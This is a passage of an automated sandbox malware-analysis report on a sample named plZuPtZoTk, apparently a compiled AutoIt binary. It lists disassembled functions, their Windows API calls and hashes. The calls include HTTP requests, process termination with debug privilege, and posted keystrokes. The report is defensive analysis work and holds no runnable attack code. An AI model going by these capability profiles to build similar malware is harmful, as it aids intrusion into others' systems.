                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 1924731296-2107944366
                                                                      • Opcode ID: 16f1e6e68f5fab90240cceb062cc0404a2c8983e5d8a487b3ee05daca300662e
                                                                      • Instruction ID: a2c9fbf947e658a5cebf53b8c841ca9662481e16fc0d193529782218c54f2675
                                                                      • Opcode Fuzzy Hash: 16f1e6e68f5fab90240cceb062cc0404a2c8983e5d8a487b3ee05daca300662e
                                                                      • Instruction Fuzzy Hash: 7051AC70604300AFD700EF60CC9AFAA77E4FB88715F000A2DF996672E1DB749909CB62
                                                                      Function 00A3C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A3C272
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A3C29A
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A3C2CA
                                                                      • GetLastError.KERNEL32 ref: 00A3C322
                                                                      • SetEvent.KERNEL32(?), ref: 00A3C336
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00A3C341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 7a2a062f4e718716671884571721ab220e7a0bdab03ab8e2ab6a5641fdfd0854
                                                                      • Instruction ID: 21ecadc133153b52e691adc6900676ab8025897685610b8533b1ac23a9c95c85
                                                                      • Opcode Fuzzy Hash: 7a2a062f4e718716671884571721ab220e7a0bdab03ab8e2ab6a5641fdfd0854
                                                                      • Instruction Fuzzy Hash: 75316BB1600308AFD721EFA49D88AABBBFCFB49764F14851EF446A7200DB34DD059B61
                                                                      Function 00A2989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A03AAF,?,?,Bad directive syntax error,00A5CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A298BC
                                                                      • LoadStringW.USER32(00000000,?,00A03AAF,?), ref: 00A298C3
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A29987
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 858772685-4153970271
                                                                      • Opcode ID: 966c63b272de24310b2bee11d5baf98afc3720af0e71edae6b1178f0630d0f7c
                                                                      • Instruction ID: db61908732acc9cc4f730683d0c0c6a4630617381dba5477b2fb1f28e4d20457
                                                                      • Opcode Fuzzy Hash: 966c63b272de24310b2bee11d5baf98afc3720af0e71edae6b1178f0630d0f7c
                                                                      • Instruction Fuzzy Hash: 9B216B31D4021ABBDF11AF90DC0AFEE7739FF18700F04882AF519660A2EA319658DB11
                                                                      Function 00A2209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00A220AB
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00A220C0
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A2214D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1290815626-3381328864
                                                                      • Opcode ID: 2f092f4716b4a770c6d576b728d5725853ceca18ee8d1e5c188baf3d5cddc1ef
                                                                      • Instruction ID: 40fa0dd4af0c8073c0c5e5fa2c6dfd83c2841f6b881b820a0f00748c51c4b145
                                                                      • Opcode Fuzzy Hash: 2f092f4716b4a770c6d576b728d5725853ceca18ee8d1e5c188baf3d5cddc1ef
                                                                      • Instruction Fuzzy Hash: 9211E77AA88716B9F6017665EC0AEE637ACEF14334B200236FB04A50D1FE655D225718
                                                                      Function 009F8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ee7b904fb85da3b0f44a599a8b6be82bb48e1cdb56ecea73b9aef6431d3b99fc
                                                                      • Instruction ID: 22f30bd5c1cb97e8eeefd3e9bcfe2860d1b49dbf751a11b5ad49ea1c0c213513
                                                                      • Opcode Fuzzy Hash: ee7b904fb85da3b0f44a599a8b6be82bb48e1cdb56ecea73b9aef6431d3b99fc
                                                                      • Instruction Fuzzy Hash: 45C1F475A0424DAFCB11DFA9D841BBEBBB4BF49310F18409AE614A7392CB359D41CB61
                                                                      Function 009FCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                      • String ID:
                                                                      • API String ID: 1282221369-0
                                                                      • Opcode ID: 741a135dfe7f06c6bd0f4143c5df2d8539ff66cc1202c31e9ac77a5ab38d351e
                                                                      • Instruction ID: a5404ddf25dcbbce005c6b01227dbdf8af0c46539cc397e41768558626701ab3
                                                                      • Opcode Fuzzy Hash: 741a135dfe7f06c6bd0f4143c5df2d8539ff66cc1202c31e9ac77a5ab38d351e
                                                                      • Instruction Fuzzy Hash: 64614AB1A0430DAFDB21AFB49981B7EBBA9EF45350F04816EFB419B281DB319D018790
                                                                      Function 00A550D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A55186
                                                                      • ShowWindow.USER32(?,00000000), ref: 00A551C7
                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00A551CD
                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A551D1
                                                                        • Part of subcall function 00A56FBA: DeleteObject.GDI32(00000000), ref: 00A56FE6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A5520D
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A5521A
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A5524D
                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A55287
                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A55296
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 907c32edd3a28a417a179961453b7841faf26ae70a819bcecfd5c746578b49db
                                                                      • Instruction ID: 0913c2a350449938e83e17379cf4799f7ee40227283e48aa1c2007e78c07f0ba
                                                                      • Opcode Fuzzy Hash: 907c32edd3a28a417a179961453b7841faf26ae70a819bcecfd5c746578b49db
                                                                      • Instruction Fuzzy Hash: D3518F30E50A08BEEF20AF74CC66BD93BB5FB15322F148112FE15966E0C775A988DB41
                                                                      Function 009D8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A16890
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A168A9
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A168B9
                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A168D1
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A168F2
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00A16901
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A1691E
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00A1692D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID:
                                                                      • API String ID: 1268354404-0
                                                                      • Opcode ID: 22144a6c0bba86b306839d8217eaf2462d78c15343bd456f5ce7bec7bc1a148a
                                                                      • Instruction ID: 23c7c6d811c38b28ec1093c531a93377bba6bb758189a1a9e1e8445b2aa4420b
                                                                      • Opcode Fuzzy Hash: 22144a6c0bba86b306839d8217eaf2462d78c15343bd456f5ce7bec7bc1a148a
                                                                      • Instruction Fuzzy Hash: 2B51A770640309AFDB20CF64CC95FAA7BB5FB48760F10891AF912D72A0DB78E991DB40
                                                                      Function 00A3C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A3C182
                                                                      • GetLastError.KERNEL32 ref: 00A3C195
                                                                      • SetEvent.KERNEL32(?), ref: 00A3C1A9
                                                                        • Part of subcall function 00A3C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A3C272
                                                                        • Part of subcall function 00A3C253: GetLastError.KERNEL32 ref: 00A3C322
                                                                        • Part of subcall function 00A3C253: SetEvent.KERNEL32(?), ref: 00A3C336
                                                                        • Part of subcall function 00A3C253: InternetCloseHandle.WININET(00000000), ref: 00A3C341
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 337547030-0
                                                                      • Opcode ID: 19074fee050ae2b69a8df91ccf850a2abf3c504d0170a7160deb0aa4d85286c0
                                                                      • Instruction ID: c086b16b7af2cef39879392ac1115fa89f3fab25390a5b3911d3d2b4022adaf1
                                                                      • Opcode Fuzzy Hash: 19074fee050ae2b69a8df91ccf850a2abf3c504d0170a7160deb0aa4d85286c0
                                                                      • Instruction Fuzzy Hash: 7331AD71200705AFDB21AFE5DD04AABBBF8FF18321F00451DF956A6610D730E811EBA0
                                                                      Function 00A225A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A23A57
                                                                        • Part of subcall function 00A23A3D: GetCurrentThreadId.KERNEL32 ref: 00A23A5E
                                                                        • Part of subcall function 00A23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A225B3), ref: 00A23A65
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A225BD
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A225DB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A225DF
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A225E9
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A22601
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A22605
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A2260F
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A22623
                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A22627
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: eb5ff3b719197696e6828b1152eddafa1f6d4babe30a748a96de5856c1516165
                                                                      • Instruction ID: 72f41db1474bf3037cb47f62c79c20b3fd5f7889cf83735b759789c9de85b1d3
                                                                      • Opcode Fuzzy Hash: eb5ff3b719197696e6828b1152eddafa1f6d4babe30a748a96de5856c1516165
                                                                      • Instruction Fuzzy Hash: 3501D831390720BBFB10A7A89C8AF593F99EB4EB62F100021F314AE1D5C9E614458A69
                                                                      Function 00A21803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A21449,?,?,00000000), ref: 00A2180C
                                                                      • HeapAlloc.KERNEL32(00000000,?,00A21449,?,?,00000000), ref: 00A21813
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A21449,?,?,00000000), ref: 00A21828
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00A21449,?,?,00000000), ref: 00A21830
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00A21449,?,?,00000000), ref: 00A21833
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A21449,?,?,00000000), ref: 00A21843
                                                                      • GetCurrentProcess.KERNEL32(00A21449,00000000,?,00A21449,?,?,00000000), ref: 00A2184B
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00A21449,?,?,00000000), ref: 00A2184E
                                                                      • CreateThread.KERNEL32(00000000,00000000,00A21874,00000000,00000000,00000000), ref: 00A21868
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 5fa010962e0b6b4119442f0c2e939298762a60e67f09be3a77cc9d6c20d5106b
                                                                      • Instruction ID: d622d8b65d7fc294c201bb71b8f02a9076502d8d9dcf8e53de61808a525ed6f3
                                                                      • Opcode Fuzzy Hash: 5fa010962e0b6b4119442f0c2e939298762a60e67f09be3a77cc9d6c20d5106b
                                                                      • Instruction Fuzzy Hash: B401A8B5640708BFE610EBA5DC49F6B7BACFB89B21F004511FA05DB1A5CA709841CB20
                                                                      Function 00A4A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A2D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00A2D501
                                                                        • Part of subcall function 00A2D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00A2D50F
                                                                        • Part of subcall function 00A2D4DC: CloseHandle.KERNEL32(00000000), ref: 00A2D5DC
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A4A16D
                                                                      • GetLastError.KERNEL32 ref: 00A4A180
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A4A1B3
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A4A268
                                                                      • GetLastError.KERNEL32(00000000), ref: 00A4A273
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4A2C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: c784fbb44add528c0490a74e99635dac321b84ba451faf75c11452482592b3d6
                                                                      • Instruction ID: 2be7522708b51bf6ac4cff7b4ab264379872e02291b2ce69215832eb8e9743ed
                                                                      • Opcode Fuzzy Hash: c784fbb44add528c0490a74e99635dac321b84ba451faf75c11452482592b3d6
                                                                      • Instruction Fuzzy Hash: 51618F742443429FD710DF18C494F5ABBE1AFA4318F54849CE46A4B7A3C7B2ED46CB92
                                                                      Function 00A53886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A53925
                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A5393A
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A53954
                                                                      • _wcslen.LIBCMT ref: 00A53999
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A539C6
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A539F4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcslen
                                                                      • String ID: SysListView32
                                                                      • API String ID: 2147712094-78025650
                                                                      • Opcode ID: 184969448054d604b9ad85b6af41027ae8e33ba0b798d2feb39d6db4a2ebf9e6
                                                                      • Instruction ID: cef958324c92eb24ef89d4788cd9b9ce14e06f366da1eab4d859dcb8f0013177
                                                                      • Opcode Fuzzy Hash: 184969448054d604b9ad85b6af41027ae8e33ba0b798d2feb39d6db4a2ebf9e6
                                                                      • Instruction Fuzzy Hash: 03419172A00319ABEF21DF64CC45BEA7BA9FF48391F100526F958E7281D7759E84CB90
                                                                      Function 00A2BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A2BCFD
                                                                      • IsMenu.USER32(00000000), ref: 00A2BD1D
                                                                      • CreatePopupMenu.USER32 ref: 00A2BD53
                                                                      • GetMenuItemCount.USER32(01665130), ref: 00A2BDA4
                                                                      • InsertMenuItemW.USER32(01665130,?,00000001,00000030), ref: 00A2BDCC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                      • String ID: 0$2
                                                                      • API String ID: 93392585-3793063076
                                                                      • Opcode ID: 3845b95a520b1c6db6d0911503631a44aae587312c5f279bb4fe148341b85749
                                                                      • Instruction ID: c12c45fa74112f2377c1ffadb060de870918776238c834145b87532dc36f8a54
